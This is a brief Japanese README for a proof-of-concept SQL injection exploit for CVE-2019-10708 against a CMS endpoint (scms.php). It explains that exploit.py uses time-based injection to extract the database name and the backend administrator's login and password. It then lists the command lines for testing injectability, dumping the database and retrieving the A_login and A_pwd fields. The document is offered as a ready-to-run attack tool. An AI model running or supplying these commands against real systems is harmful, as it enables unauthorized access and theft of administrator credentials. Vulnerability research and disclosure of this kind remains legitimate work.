
CVE-2019-10708 SQLインジェクション PoC
exploit.pyはCVE-2019-10708脆弱性に対するPoCであり、multiprocessingを用いて注入を実行し、データベース名とバックエンド管理者のアカウント・パスワードを取得します(20190401より前のバージョンを推奨)
# 注入可能かテスト
python3 exploit.py http:localhost/js/scms.php --test
# sleep時間を60秒に設定し、データベースを取得
python3 exploit.py http:localhost/js/scms.php -s 60 --db
# A_loginとA_pwdを取得
python3 exploit.py http:localhost/js/scms.php --login --pwd